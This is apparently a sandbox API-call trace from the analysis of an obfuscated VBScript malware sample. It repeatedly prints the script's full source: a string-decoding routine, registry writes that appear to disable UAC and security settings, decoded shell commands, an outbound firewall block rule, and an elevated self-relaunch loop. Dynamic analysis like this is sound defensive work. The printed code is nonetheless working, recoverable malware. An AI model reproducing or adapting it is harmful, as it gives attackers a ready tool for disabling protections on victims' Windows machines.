CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.382] wcsncmp (_String1="LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.382] wcsncmp (_String1="ocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.382] wcsncmp (_String1="calPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.382] SetLastError (dwErrCode=0xb) [0226.382] GetLastError () returned 0xb [0226.382] SetLastError (dwErrCode=0xb) [0226.383] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0226.383] CloseCodeAuthzLevel () returned 0x1 [0226.383] FreeLibrary (hLibModule=0x76650000) returned 1 [0226.383] SysStringLen (param_1="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n") returned 0x1067 [0226.384] GetCurrentThreadId () returned 0x8c0 [0226.410] ISystemDebugEventFire:IsActive (This=0x3aa900) returned 0x1 [0226.410] GetCurrentThreadId () returned 0x8c0 [0226.410] GetCurrentThreadId () returned 0x8c0 [0226.410] GetCurrentThreadId () returned 0x8c0 [0226.410] GetCurrentThreadId () returned 0x8c0 [0226.437] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a90000 [0226.437] GetProcAddress (hModule=0x76a90000, lpProcName="CLSIDFromProgIDEx") returned 0x76aa0782 [0226.437] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x25ee50 | out: lpclsid=0x25ee50*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0226.438] SysStringLen (param_1=0x0) returned 0x0 [0226.438] GetProcAddress (hModule=0x76a90000, lpProcName="CoGetClassObject") returned 0x76ac54ad [0226.438] CoGetClassObject (in: rclsid=0x25ee50*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x6c4c4174*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ee40 | out: ppv=0x25ee40*=0x2a3788) returned 0x0 [0226.442] __dllonexit () returned 0x6dab160a [0226.442] __dllonexit () returned 0x6dab1624 [0226.442] __dllonexit () returned 0x6dab163e [0226.442] __dllonexit () returned 0x6dab16e6 [0226.443] GetUserDefaultLCID () returned 0x409 [0226.443] GetVersion () returned 0x1db10106 [0226.443] GetVersionExA (in: lpVersionInformation=0x25da48*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x25da38, dwMinorVersion=0x2, dwBuildNumber=0x260000, dwPlatformId=0x6dab1cd4, szCSDVersion="hÚ%") | out: lpVersionInformation=0x25da48*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.443] GetTickCount () returned 0x3ffc1 [0226.443] srand (_Seed=0x116a841) [0226.443] LoadRegTypeLib (in: rguid=0x6dab2840*(Data1=0x420b2830, Data2=0xe718, Data3=0x11cf, Data4=([0]=0x89, [1]=0x3d, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0x25e0e8*=0x0 | out: pptlib=0x25e0e8*=0x3b48d0) returned 0x0 [0226.447] ITypeLib:GetTypeInfoType (in: This=0x3b48d0, index=0x6dab298c, pTKind=0x2a4454 | out: pTKind=0x2a4454*=3889004) returned 0x0 [0226.471] SysStringLen (param_1="C:\\Users\\Public\\N3Eg\\uc") returned 0x17 [0226.471] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\uc") returned 0xffffffff [0226.471] GetLastError () returned 0x2 [0226.472] lstrlenW (lpString="WScript") returned 7 [0226.472] lstrlenW (lpString="WScript") returned 7 [0226.472] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0226.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) 